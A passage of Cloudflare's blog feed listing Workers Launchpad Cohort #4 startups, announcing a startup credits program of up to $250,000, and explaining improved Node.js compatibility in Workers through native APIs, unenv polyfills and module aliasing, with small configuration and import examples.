            </figure><table><tr><td><p><a href="https://adster.tech"><b>Adster</b></a></p></td><td><p>Hyperscale revenue powered by real-time data intelligence and AI</p></td></tr><tr><td><p><a href="http://www.almeta.cloud"><b>Almeta</b></a></p></td><td><p>Predict customer behavior on your website</p></td></tr><tr><td><p><a href="http://www.bestparents.com"><b>Best Parents</b></a></p></td><td><p>Disruptive educational travel marketplace for Gen Z under 18</p></td></tr><tr><td><p><a href="http://www.comigo.ai"><b>Comigo</b></a></p></td><td><p>Companion app to make therapy an engaging daily practice</p></td></tr><tr><td><p><a href="http://www.datastrato.com"><b>Datastrato</b></a></p></td><td><p>A unified data catalog for generative AI infrastructure</p></td></tr><tr><td><p><a href="https://equimake.com/"><b>Equimake</b></a></p></td><td><p>Create professional 3D projects without technical experience</p></td></tr><tr><td><p><a href="http://www.evefan.com"><b>Evefan</b></a></p></td><td><p>Your own Internet scale events infrastructure</p></td></tr><tr><td><p><a href="https://www.eventuall.live/"><b>Eventuall</b></a></p></td><td><p>Connecting stars with their fans in paid meet &amp; greets and virtual experiences</p></td></tr><tr><td><p><a href="http://www.fermat.app"><b>Fermat</b></a></p></td><td><p>No-code solution to deploy AI models as internal tools</p></td></tr><tr><td><p><a href="https://fiberplane.com"><b>Fiberplane</b></a></p></td><td><p>Development tool that uses observability data to help test and debug APIs</p></td></tr><tr><td><p><a href="http://www.firetiger.com"><b>Firetiger</b></a></p></td><td><p>An engineering observability tool that operates at scale inside customer infrastructure</p></td></tr><tr><td><p><a href="https://flightcast.com/"><b>Flightcast</b></a></p></td><td><p>Video-first podcast hosting &amp; distribution</p></td></tr><tr><td><p><a href="http://www.runway-vision.com"><b>FlightLevel Technologies</b></a></p></td><td><p>AI Analytics and Footage in the aviation industry.</p></td></tr><tr><td><p><a href="https://gitlip.com/"><b>Gitlip</b></a></p></td><td><p>Powerful, collaborative and lightweight computing platform based on Git</p></td></tr><tr><td><p><a href="http://www.gracker.ai"><b>GrackerAI</b></a></p></td><td><p>AI-powered organic growth engine for cybersecurity B2B SaaS</p></td></tr><tr><td><p><a href="https://hackernoon.com/"><b>Hackernoon</b></a></p></td><td><p>Community-driven blogging network read by millions of technologists</p></td></tr><tr><td><p><a href="https://hanabi.rest/"><b>Hanabi.REST</b></a></p></td><td><p>Prompt to REST API with AI-driven building, testing, and deployment</p></td></tr><tr><td><p><a href="http://www.infrastack.ai"><b>Infrastack</b></a></p></td><td><p>Next-gen application intelligence and observability platform for developers</p></td></tr><tr><td><p><a href="https://www.june.technology/"><b>June</b></a></p></td><td><p>AI productivity companion</p></td></tr><tr><td><p><a href="https://leed.ai/"><b>Leed AI</b></a></p></td><td><p>Combined marketing workflows, website, and customer journey for a seamless, AI-accelerated experience</p></td></tr><tr><td><p><b></b><a href="http://www.lookbk.com"><b>lookbk</b></a></p></td><td><p>Make the Internet more shoppable, starting with fashion on socials</p></td></tr><tr><td><p><a href="https://materialized.dev/"><b>Materialized Intelligence</b></a></p></td><td><p>Data-intensive inference solutions</p></td></tr><tr><td><p><a href="https://maxint.com/"><b>Maxint</b></a></p></td><td><p>Multi-platform money management powered by AI</p></td></tr><tr><td><p><a href="http://www.midio.com"><b>Midio</b></a></p></td><td><p>Visual tool to build software and AI agents</p></td></tr><tr><td><p><a href="http://www.nika.eco"><b>NikaPlanet</b></a></p></td><td><p>Transformative geospatial analytics experience with Google Colab, QGIS, ChatGPT, and Miro in one solution</p></td></tr><tr><td><p><a href="http://www.nothotdog.dev"><b>NotHotDog</b></a></p></td><td><p>AI-Powered API Testing Tool</p></td></tr><tr><td><p><a href="https://www.outerbase.com/"><b>Outerbase</b></a></p></td><td><p>View, edit, query, and visualize your data with AI</p></td></tr><tr><td><p><a href="http://www.procureezy.com"><b>Procureezy</b></a></p></td><td><p>AI procurement platform to empower hardware engineers to source smarter and launch sooner</p></td></tr><tr><td><p><a href="http://www.proma.ai"><b>Proma</b></a></p></td><td><p>Process management and automation platform to get work done fast</p></td></tr><tr><td><p><a href="https://www.renderbetter.com/"><b>Render Better</b></a></p></td><td><p>Increase e-commerce revenue by optimizing your site speed, automatically</p></td></tr><tr><td><p><a href="http://www.sherpo.io"><b>Sherpo</b></a></p></td><td><p>AI-first no-code platform to build and sell digital content</p></td></tr><tr><td><p><a href="https://speak.careers/"><b>Speak_</b></a></p></td><td><p>AI platform to surface top talent by evaluating candidates against custom criteria</p></td></tr><tr><td><p><a href="https://tightknit.ai/"><b>Tightknit</b></a></p></td><td><p>Embedded community engagement platform built for SaaS</p></td></tr><tr><td><p><a href="https://www.tinfoil.sh/"><b>Tinfoil</b></a></p></td><td><p>Powerful analytics with cryptographic privacy guarantees</p></td></tr><tr><td><p><a href="https://www.usevelvet.com/"><b>Velvet</b></a></p></td><td><p>AI gateway to monitor, evaluate, and optimize features</p></td></tr><tr><td><p><a href="https://webstudio.is/"><b>Webstudio</b></a></p></td><td><p>An advanced visual site builder that connects to any headless CMS</p></td></tr><tr><td><p><a href="https://ziprlinks.com/"><b>Zipr</b></a></p></td><td><p>Streamlined visitor management</p></td></tr></table><p>The Cloudflare team is ecstatic to work with the amazing participants of Cohort #4. If you want to follow along on Cohort #4’s journey, be sure to follow <a href="https://x.com/CloudflareDev"><u>@CloudflareDev</u></a> on X and join our <a href="https://discord.com/invite/cloudflaredev?cf_target_id=4874A68FFE682C2DFA5CB8063B4025ED"><u>Developer Discord</u></a> server.</p><p>Are you a startup building on Cloudflare? <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Apply for Cohort #5!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">2Q277uIpNI04K4kTcUXLkf</guid>
            <dc:creator>Melissa Kargiannakis</dc:creator>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Veronica Marin</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup Program revamped: build and grow on Cloudflare with up to $250,000 in credits]]></title>
            <link>https://blog.cloudflare.com/startup-program-250k-credits/</link>
            <pubDate>Thu, 26 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s Startup Program now offers up to $250,000 in credits for companies building on our Developer Platform. The program relaunch uses clear and predictable credits so that you can easily see how usage impacts future pricing.  ]]></description>
            <content:encoded><![CDATA[ <p>Today, we’re pleased to offer startups up to $250,000 in credits to use on Cloudflare’s <a href="https://www.cloudflare.com/developer-platform/products/"><u>Developer Platform</u></a>. This new credits system will allow you to clearly see usage and associated fees to plan for a predictable future after the $250,000 in credits have been used up or after one year, whichever happens first.</p><p>You can see eligibility criteria and apply to the start-up program <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a>. </p>
    <div>
      <h2>What can you use the credits for?</h2>
      <a href="#what-can-you-use-the-credits-for">
        
      </a>
    </div>
    <p>Credits can be applied to all Developer Platform products, as well as <a href="https://developers.cloudflare.com/argo-smart-routing/"><u>Argo</u></a> and <a href="https://developers.cloudflare.com/cache/advanced-configuration/cache-reserve/"><u>Cache Reserve</u></a>. Moreover, we provide participants with up to three <a href="https://www.cloudflare.com/plans/"><u>Enterprise-level domains</u></a>, which includes CDN, DDoS, DNS, WAF, Zero Trust, and other <a href="https://www.cloudflare.com/application-services/products/"><u>security and performance products</u></a> that a participant can enable for their website.</p>
    <div>
      <h3>Developer tools and building on Cloudflare</h3>
      <a href="#developer-tools-and-building-on-cloudflare">
        
      </a>
    </div>
    <p>You can use credits for Cloudflare Developer Platform products, including those listed in the table below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/QXGJp4eBt8AQTXleACTnI/a4b0dda0167733d9e04a8bf1ed5bc611/image1.png" />
            
            </figure><p><sup><i>Note: credits for the Cloudflare Startup Program apply to Cloudflare products only, this table is illustrative of similar products in the market.</i></sup></p>
    <div>
      <h3>Speed and performance with Cloudflare</h3>
      <a href="#speed-and-performance-with-cloudflare">
        
      </a>
    </div>
    <p>We know that founders need all the help they can get when starting their businesses. Beyond the Developer Platform, you can also use the Startup Program for our speed and performance products. Getting customers where they need to go within <a href="https://developers.cloudflare.com/speed/"><u>milliseconds</u></a> on your website or application is the difference between closing a sale or not. You can test your speed <a href="https://developers.cloudflare.com/fundamentals/basic-tasks/test-speed/"><u>here</u></a> and learn how to optimize your speed and performance <a href="https://developers.cloudflare.com/learning-paths/get-started/performance/optimize-speed/"><u>here</u></a> with solutions like: <a href="https://developers.cloudflare.com/images/"><u>Images</u></a>, <a href="https://developers.cloudflare.com/argo-smart-routing/"><u>Argo</u></a>, and <a href="https://developers.cloudflare.com/cache/advanced-configuration/early-hints/"><u>Early Hints</u></a>.</p>
    <div>
      <h3>Security from Cloudflare</h3>
      <a href="#security-from-cloudflare">
        
      </a>
    </div>
    <p>But, wait, there’s more: beyond the Developer Platform products and speed tools, you can also use Cloudflare’s many security features through the Startup Program as well. These include <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall</u></a> (<a href="https://www.google.com/aclk?sa=l&amp;ai=DChcSEwj6jt32op2IAxXk1cIEHQVsCf8YABAAGgJwdg&amp;co=1&amp;ase=2&amp;gclid=Cj0KCQjw28W2BhC7ARIsAPerrcIntApH-BAsWuajq8owh4eTi3Z1hH6S3xeg51-QEKIIuOYtfAxN7TUaAvSvEALw_wcB&amp;sig=AOD64_2mwuQ5V4e7y1VboIJtoTEiFHnEkg&amp;q&amp;nis=4&amp;adurl&amp;ved=2ahUKEwjOpdj2op2IAxU5LEQIHf_dDqIQ0Qx6BAgYEAE"><u>WAF</u></a>), <a href="https://developers.cloudflare.com/ddos-protection/reference/alerts/"><u>DDoS Alerts</u></a>, bundled <a href="https://www.cloudflare.com/plans/"><u>protection plans</u></a>, and more. The Startup Program also includes <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>Zero Trust</u></a> solutions. Learn how others are <a href="https://www.cloudflare.com/case-studies/?usecase=Enable+zero+trust+security+for+workforce"><u>securing their technology and tools</u></a> with Cloudflare Zero Trust.</p><p>For more inspiration, check out our <a href="https://workers.cloudflare.com/built-with/"><u>Built with Cloudflare site</u></a>, which highlights what other startups are building. </p>
    <div>
      <h2>Who can use the credits?</h2>
      <a href="#who-can-use-the-credits">
        
      </a>
    </div>
    <p>Eligibility criteria can be found <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a> and include:</p><ul><li><p><code><i>Companies building a software-based product or service</i></code></p></li><li><p><code><i>Founded within the last 5 years (2019-2024)</i></code></p></li><li><p><code><i>Have between $50,000 - $5,000,000 in funding</i></code></p><ul><li><p><code><i>Note that for startups who have not yet raised at least $50,000, there may be other opportunities for lower credit amounts. Please apply with the promo code “BOOTSTRAPPED” if you haven’t raised $50,000 yet, but are interested in the Cloudflare Startup Program</i></code></p></li></ul></li><li><p><code><i>Have a LinkedIn profile, valid website, and email address</i></code></p></li><li><p><code><i>Bonus criteria that adds to your application: being part of an approved accelerator</i></code></p></li></ul>
    <div>
      <h2>What will you build?</h2>
      <a href="#what-will-you-build">
        
      </a>
    </div>
    <p>We’re excited to see what you will build. Please <a href="https://discord.com/invite/cloudflaredev"><u>share what you’re up to with us</u></a> so that we can help you however it makes sense. If you’re actively using Cloudflare’s Developer Platform, we’d love to hear more about what you’re building and share it on our <a href="https://workers.cloudflare.com/built-with/"><u>Built with Cloudflare site</u></a>.</p><p>Are you a startup looking for additional support, resources, or access to funding? Apply for our <a href="https://blog.cloudflare.com/tag/workers-launchpad"><u>Workers Launchpad Program</u></a>! The program runs for a few months, and in addition to the Startup Program, participants get access to hands-on bootcamp sessions, Solutions Architect office hours, introductions to VCs, and the opportunity to present at Demo Day.</p>
    <div>
      <h2>Why does Cloudflare support founders and startups? </h2>
      <a href="#why-does-cloudflare-support-founders-and-startups">
        
      </a>
    </div>
    <p>Founders and developers face enough challenges without having to worry about incurring egregious costs to test technology and start building in the earliest days. You have the world at your fingertips and should be empowered to build and create without limitations. Invest money in your innovation, not in the infrastructure and technology that supports it.</p><p>The Startup Program understands this founder experience deeply, as the team is made up of former founders. Cloudflare is committed to programs like this to empower founders building the <i>next big thing</i>. Offering up to $250,000 in credits will allow folks to leverage even more of what we have to offer: a developer experience that removes friction, saves money, and gets applications spun up in hours, not days. </p><p>We want to support founders from everywhere on earth.</p><p>Be bold and keep building! Follow <a href="https://x.com/cloudflaredev"><u>@CloudflareDev</u></a> and join our <a href="https://discord.com/invite/cloudflaredev"><u>Developer Discord</u></a> server.</p><p>Are you a startup building on Cloudflare? <a href="https://www.cloudflare.com/forstartups"><u>Apply here!</u></a></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">4ZEcwzAEh1rg9IxDqC3UyM</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Melissa Kargiannakis</dc:creator>
        </item>
        <item>
            <title><![CDATA[More NPM packages on Cloudflare Workers: Combining polyfills and native code to support Node.js APIs]]></title>
            <link>https://blog.cloudflare.com/more-npm-packages-on-cloudflare-workers-combining-polyfills-and-native-code/</link>
            <pubDate>Mon, 09 Sep 2024 21:00:00 GMT</pubDate>
            <description><![CDATA[ Workers now supports more NPM packages and Node.js APIs using an overhauled hybrid compatibility layer. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Today, we are excited to announce a preview of <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>improved Node.js compatibility</u></a> for Workers and Pages. Broader compatibility lets you use more NPM packages and take advantage of the JavaScript ecosystem when writing your Workers.</p><p>Our newest version of Node.js compatibility combines the best features of our previous efforts. <a href="https://workers.cloudflare.com/"><u>Cloudflare Workers</u></a> have supported Node.js in some form for quite a while. We first announced polyfill support in <a href="https://blog.cloudflare.com/node-js-support-cloudflare-workers"><u>2021</u></a>, and later <a href="https://blog.cloudflare.com/workers-node-js-asynclocalstorage"><u>built-in support for parts of the Node.js API</u></a> that has <a href="https://blog.cloudflare.com/workers-node-js-apis-stream-path"><u>expanded</u></a> over time.</p><p>The latest changes make it even better:</p><ul><li><p>You can use far more <a href="https://en.wikipedia.org/wiki/Npm"><u>NPM</u></a> packages on Workers.</p></li><li><p>You can use packages that do not use the <code>node</code>: prefix to import Node.js APIs</p></li><li><p>You can use <a href="https://workers-nodejs-compat-matrix.pages.dev/"><u>more Node.js APIs on Workers</u></a>, including most methods on <a href="https://nodejs.org/docs/latest/api/async_hooks.html"><code><u>async_hooks</u></code></a>, <a href="https://nodejs.org/api/buffer.html"><code><u>buffer</u></code></a>, <a href="https://nodejs.org/api/dns.html"><code><u>dns</u></code></a>, <a href="https://nodejs.org/docs/latest/api/os.html"><code><u>os</u></code></a>, and <a href="https://nodejs.org/docs/latest/api/events.html"><code><u>events</u></code></a>. Many more, such as <a href="https://nodejs.org/api/fs.html"><code><u>fs</u></code></a> or <a href="https://nodejs.org/docs/latest/api/process.html"><code><u>process</u></code></a> are importable with mocked methods.</p></li></ul><p>To give it a try, add the following flag to <code>wrangler.toml</code>, and deploy your Worker with <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>:</p><p><code>compatibility_flags = ["nodejs_compat_v2"]</code></p><p>Packages that could not be imported with <code>nodejs_compat</code>, even as a dependency of another package, will now load. This includes popular packages such as <a href="https://www.npmjs.com/package/body-parser">body-parser</a>, <a href="https://www.npmjs.com/package/jsonwebtoken">jsonwebtoken</a>, {}<a href="https://www.npmjs.com/package/got">got</a>, <a href="https://www.npmjs.com/package/passport">passport</a>, <a href="https://www.npmjs.com/package/md5">md5</a>, <a href="https://www.npmjs.com/package/knex">knex</a>, <a href="https://www.npmjs.com/package/mailparser">mailparser</a>, <a href="https://www.npmjs.com/package/csv-stringify">csv-stringify</a>, <a href="https://www.npmjs.com/package/cookie-signature">cookie-signature</a>, <a href="https://www.npmjs.com/package/stream-slice">stream-slice</a>, and many more.</p><p>This behavior will soon become the default for all Workers with the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>existing nodejs_compat compatibility flag</u></a> enabled, and a <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/"><u>compatibility date</u></a> of 2024-09-23 or later. As you experiment with improved Node.js compatibility, share your feedback by <a href="https://github.com/cloudflare/workers-sdk/issues/new?assignees=&amp;labels=bug&amp;projects=&amp;template=bug-template.yaml&amp;title=%F0%9F%90%9B+BUG%3A"><u>opening an issue on GitHub</u></a>.</p>
    <div>
      <h3>Workerd is not Node.js</h3>
      <a href="#workerd-is-not-node-js">
        
      </a>
    </div>
    <p>To understand the latest changes, let’s start with a brief overview of how the Workers runtime differs from <a href="https://nodejs.org/"><u>Node.js</u></a>.</p><p>Node.js was built primarily for services run directly on a host OS and pioneered server-side JavaScript. Because of this, it includes functionality necessary to interact with the host machine, such as <a href="https://nodejs.org/api/process.html"><u>process</u></a> or <a href="https://nodejs.org/api/fs.html"><u>fs</u></a>, and a variety of utility modules, such as <a href="https://nodejs.org/api/crypto.html"><u>crypto</u></a>.</p><p>Cloudflare Workers run on an open source JavaScript/Wasm runtime called <a href="https://github.com/cloudflare/workerd"><u>workerd</u></a>. While both Node.js and workerd are built on <a href="https://v8.dev/"><u>V8</u></a>, workerd is <a href="https://blog.cloudflare.com/cloud-computing-without-containers"><u>designed to run untrusted code in shared processes</u></a>, exposes <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/"><u>bindings</u></a> for interoperability with other Cloudflare services, including <a href="https://blog.cloudflare.com/javascript-native-rpc"><u>JavaScript-native RPC</u></a>, and uses <a href="https://blog.cloudflare.com/introducing-the-wintercg"><u>web-standard APIs</u></a> whenever possible.</p><p>Cloudflare <a href="https://blog.cloudflare.com/introducing-the-wintercg/"><u>helped establish</u></a> <a href="https://wintercg.org/"><u>WinterCG</u></a>, the Web-interoperable Runtimes Community Group to improve interoperability of JavaScript runtimes, both with each other and with the web platform. You can build many applications using only web-standard APIs, but what about when you want to import dependencies from NPM that rely on Node.js APIs?</p><p>For example, if you attempt to import <a href="https://www.npmjs.com/package/pg"><u>pg</u></a>, a PostgreSQL driver, without Node.js compatibility turned on…</p>
            <pre><code>import pg from 'pg'</code></pre>
            <p>You will see the following error when you run <a href="https://developers.cloudflare.com/workers/wrangler/commands/#dev"><u>wrangler dev</u></a> to build your Worker:</p>
            <pre><code>✘ [ERROR] Could not resolve "events"
    ../node_modules/.pnpm/pg-cloudflare@1.1.1/node_modules/pg-cloudflare/dist/index.js:1:29:
      1 │ import { EventEmitter } from 'events';
        ╵                              ~~~~~~~~
  The package "events" wasn't found on the file system but is built into node.</code></pre>
            <p>This happens because the pg package imports the <a href="https://nodejs.org/api/events.html"><u>events module</u></a> from Node.js, which is not provided by workerd by default.</p><p>How can we enable this?</p>
    <div>
      <h3>Our first approach – build-time polyfills</h3>
      <a href="#our-first-approach-build-time-polyfills">
        
      </a>
    </div>
    <p>Polyfills are code that add functionality to a runtime that does not natively support it. They are often added to provide modern JavaScript functionality to older browsers, but can be used for server-side runtimes as well.</p><p>In 2022, we <a href="https://github.com/cloudflare/workers-sdk/pull/869"><u>added functionality to Wrangler</u></a> that injected polyfill implementations of some Node.js APIs into your Worker if you set <code>node_compat = true</code> in your wrangler.toml. For instance, the following code would work with this flag, but not without:</p>
            <pre><code>import EventEmitter from 'events';
import { inherits } from 'util';</code></pre>
            <p>These polyfills are essentially just additional JavaScript code added to your Worker by <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a> when deploying the Worker. This behavior is enabled by <a href="https://www.npmjs.com/package/@esbuild-plugins/node-globals-polyfill"><code><u>@esbuild-plugins/node-globals-polyfill</u></code></a> which in itself uses <a href="https://github.com/ionic-team/rollup-plugin-node-polyfills/"><code><u>rollup-plugin-node-polyfills</u></code></a>.</p><p>This allows you to import and use some NPM packages, such as pg. However, many modules cannot be polyfilled with fast enough code or cannot be polyfilled at all.</p><p>For instance, <a href="https://nodejs.org/api/buffer.html"><u>Buffer</u></a> is a common Node.js API used to handle binary data. Polyfills exist for it, but JavaScript is often not optimized for the operations it performs under the hood, such as <code>copy</code>, <code>concat</code>, substring searches, or transcoding. While it is possible to implement in pure JavaScript, it could be far faster if the underlying runtime could use primitives from different languages. Similar limitations exist for other popular APIs such as <a href="https://nodejs.org/api/crypto.html"><u>Crypto</u></a>, <a href="https://nodejs.org/api/async_context.html"><u>AsyncLocalStorage</u></a>, and <a href="https://nodejs.org/api/stream.html"><u>Stream</u></a>.</p>
    <div>
      <h3>Our second approach – native support for some Node.js APIs in the Workers runtime</h3>
      <a href="#our-second-approach-native-support-for-some-node-js-apis-in-the-workers-runtime">
        
      </a>
    </div>
    <p>In 2023, we <a href="https://blog.cloudflare.com/workers-node-js-asynclocalstorage"><u>started adding</u></a> a subset of Node.js APIs directly to the Workers runtime. You can enable these APIs by adding the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>nodejs_compat compatibility flag</u></a> to your Worker, but you cannot use polyfills with <code>node_compat = true</code> at the same time.</p><p>Also, when importing Node.js APIs, you must use the <code>node</code>: prefix:</p>
            <pre><code>import { Buffer } from 'node:buffer';</code></pre>
            <p>Since these Node.js APIs are built directly into the Workers runtime, they can be <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/buffer.c%2B%2B"><u>written in C++</u></a>, which allows them to be faster than JavaScript polyfills. APIs like <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/asynclocalstorage/"><u>AsyncLocalStorage</u></a>, which cannot be polyfilled without safety or performance issues, can be provided natively.</p><p>Requiring the <code>node: </code>prefix made imports more explicit and aligns with modern Node.js conventions. Unfortunately, existing NPM packages may import modules without <code>node:</code>. For instance, revisiting the example above, if you import the popular package <code>pg</code> in a Worker with the <code>nodejs_compat</code> flag, you still see the following error:</p>
            <pre><code>✘ [ERROR] Could not resolve "events"
    ../node_modules/.pnpm/pg-cloudflare@1.1.1/node_modules/pg-cloudflare/dist/index.js:1:29:
      1 │ import { EventEmitter } from 'events';
        ╵                              ~~~~~~~~
  The package "events" wasn't found on the file system but is built into node.</code></pre>
            <p>Many NPM packages still didn’t work in Workers, even if you enabled the <code>nodejs_compat</code> compatibility flag. You had to choose between a smaller set of performant APIs, exposed in a way that many NPM packages couldn’t access, or a larger set of incomplete and less performant APIs. And APIs like <code>process</code> that are exposed as globals in Node.js could still only be accessed by importing them as modules.</p>
    <div>
      <h3>The new approach: a hybrid model</h3>
      <a href="#the-new-approach-a-hybrid-model">
        
      </a>
    </div>
    <p>What if we could have the best of both worlds, and it just worked?</p><ul><li><p>A subset of Node.js APIs implemented directly in the Workers Runtime </p></li><li><p>Polyfills for the majority of other Node.js APIs</p></li><li><p>No <code>node</code>: prefix required</p></li><li><p>One simple way to opt-in</p></li></ul><p>Improved Node.js compatibility does just that.</p><p>Let’s take a look at two lines of code that look similar, but now act differently under the hood when <code>nodejs_compat_v2</code> is enabled:</p>
            <pre><code>import { Buffer } from 'buffer';  // natively implemented
import { isIP } from 'net'; // polyfilled</code></pre>
            <p>The first line imports <code>Buffer</code> from a <a href="https://github.com/cloudflare/workerd/blob/main/src/node/internal/internal_buffer.ts"><u>JavaScript module</u></a> in workerd that is backed by <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/buffer.c%2B%2B"><code><u>C++ code</u></code></a>. Various other Node.js modules are similarly implemented in a combination of Typescript and C++, including <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/async-hooks.h"><code><u>AsyncLocalStorage</u></code></a> and <a href="https://github.com/cloudflare/workerd/blob/main/src/workerd/api/node/crypto.h"><code><u>Crypto</u></code></a>. This allows for highly performant code that matches Node.js behavior.</p><p>Note that the <code>node:</code> prefix is not needed when importing <code>buffer</code>, but the code would also work with <code>node:buffer</code>.</p><p>The second line imports <code>net</code> which Wrangler automatically polyfills using a library called <a href="https://github.com/unjs/unenv"><u>unenv</u></a>. Polyfills and built-in runtime APIs now work together.</p><p>Previously, when you set <code>node_compat = true</code>, Wrangler added polyfills for every Node.js API that it was able to, even if neither your Worker nor its dependencies used that API. When you enable the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>nodejs_compat_v2 compatibility flag</u></a>, Wrangler only adds polyfills for Node.js APIs that your Worker or its dependencies actually use. This results in small Worker sizes, even with polyfills.</p><p>For some Node.js APIs, there is not yet native support in the Workers runtime nor a polyfill implementation. In these cases, unenv “mocks” the interface. This means it adds the module and its methods to your Worker, but calling methods of the module will either do nothing or will throw an error with a message like:</p><p><code>[unenv] &lt;method name&gt; is not implemented yet!</code></p><p>This is more important than it might seem. Because if a Node.js API is “mocked”, NPM packages that depend on it can still be imported. Consider the following code:</p>
            <pre><code>// Package name: my-module

import fs from "fs";

export function foo(path) {
  const data = fs.readFileSync(path, 'utf8');
  return data;
}

export function bar() {
  return "baz";
}
</code></pre>
            
            <pre><code>import { bar } from "my-module"

bar(); // returns "baz"
foo(); // throws readFileSync is not implemented yet!
</code></pre>
            <p>Previously, even with the <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>existing nodejs_compat compatibility flag</u></a> enabled, attempting to import my-module would fail at build time, because the <code>fs</code> module could not be resolved. Now, the <code>fs</code> module can be resolved, methods that do not rely on an unimplemented Node.js API work, and methods that do throw a more specific error – a runtime error that a specific Node.js API method is not yet supported, rather than a build-time error that the module could not be resolved.</p><p>This is what enables some packages to transition from “doesn’t even load on Workers” to, “loads, but with some unsupported methods”.</p>
    <div>
      <h3>Still missing an API from Node.js? Module aliasing to the rescue</h3>
      <a href="#still-missing-an-api-from-node-js-module-aliasing-to-the-rescue">
        
      </a>
    </div>
    <p>Let’s say you need an NPM package to work on Workers that relies on a Node.js API that isn’t yet implemented in the Workers runtime or as a polyfill in unenv. You can use <a href="https://developers.cloudflare.com/workers/wrangler/configuration/#module-aliasing"><u>module aliasing</u></a> to implement just enough of that API to make things work.</p><p>For example, let’s say the NPM package you need to work calls <a href="https://nodejs.org/api/fs.html#fsreadfilepath-options-callback"><u>fs.readFile</u></a>. You can alias the fs module by adding the following to your Worker’s wrangler.toml:</p>
            <pre><code>[alias]
"fs" = "./fs-polyfill"</code></pre>
            <p>Then, in the fs-polyfill.js file, you can define your own implementation of any methods of the fs module:</p>
            <pre><code>export function readFile() {
  console.log("readFile was called");
  // ...
}
</code></pre>
            <p>Now, the following code, which previously threw the error message “[unenv] readFile is not implemented yet!”, runs without errors:</p>
            <pre><code>import { readFile } from 'fs';

export default {
  async fetch(request, env, ctx) {
    readFile();
    return new Response('Hello World!');
  },
};
</code></pre>
            <p>You can also use module aliasing to provide an implementation of an NPM package that does not work on Workers, even if you only rely on that NPM package indirectly, as a dependency of one of your Worker's dependencies.</p><p>For example, some NPM packages, such as <a href="https://www.npmjs.com/package/cross-fetch"><u>cross-fetch</u></a>, depend on <a href="https://www.npmjs.com/package/node-fetch"><u>node-fetch</u></a>, a package that provided a polyfill of the <a href="https://developers.cloudflare.com/workers/runtime-apis/fetch/"><u>fetch() API</u></a> before it was built into Node.js. The node-fetch package isn't needed in Workers, because the fetch() API is provided by the Workers runtime. And node-fetch doesn't work on Workers, because it relies on currently unsupported Node.js APIs from the <a href="https://nodejs.org/api/http.html"><u>http</u></a> and <a href="https://nodejs.org/api/https.html"><u>https</u></a> modules.</p><p>You can alias all imports of node-fetch to instead point directly to the fetch() API that is built into the Workers runtime using the popular <a href="https://github.com/SukkaW/nolyfill"><u>nolyfill</u></a> package:</p>
            <pre><code>[alias]
"node-fetch" = "./fetch-nolyfill"</code></pre>
            <p>All your replacement module needs to do in this case is to re-export the fetch API that is built into the Workers runtime:</p>
            <pre><code>export default fetch;</code></pre>
            
    <div>
      <h3>Contributing back to unenv</h3>
      <a href="#contributing-back-to-unenv">
        
      </a>
    </div>
    <p>Cloudflare is actively contributing to unenv. We think unenv is solving the problem of cross-runtime compatibility the right way — it adds only the necessary polyfills to your application, based on what APIs you use and what runtime you target. The project supports a variety of runtimes beyond workerd and is already used by other popular projects including <a href="https://nuxt.com/"><u>Nuxt</u></a> and <a href="https://nitro.unjs.io/"><u>Nitro</u></a>. We want to thank <a href="https://github.com/pi0"><u>Pooya Parsa</u></a> and the unenv maintainers and encourage others in the ecosystem to adopt or contribute.</p>
    <div>
      <h3>The path forward</h3>
      <a href="#the-path-forward">
        
      </a>
    </div>
    <p>Currently, you can enable improved Node.js compatibility by setting the <code>nodejs_compat_v2</code> flag in <code>wrangler.toml</code>. We plan to make the new behavior the default when using the <code>nodejs_compat</code> flag on September 23rd. This will require updating your <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/"><code><u>compatibility_date</u></code></a>.</p><p>We are excited about the changes coming to Node.js compatibility, and encourage you to try it today. <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>See the documentation</u></a> on how to opt-in for your Workers, and please send feedback and report bugs <a href="https://github.com/cloudflare/workers-sdk/issues/new?assignees=&amp;labels=bug&amp;projects=&amp;template=bug-template.yaml&amp;title=%F0%9F%90%9B+BUG%3A"><u>by opening an issue</u></a>. Doing so will help us identify any gaps in support and ensure that as much of the Node.js ecosystem as possible runs on Workers.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[JavaScript]]></category>
            <guid isPermaLink="false">3zICVbgdxrLByG4g2Dsddy</guid>
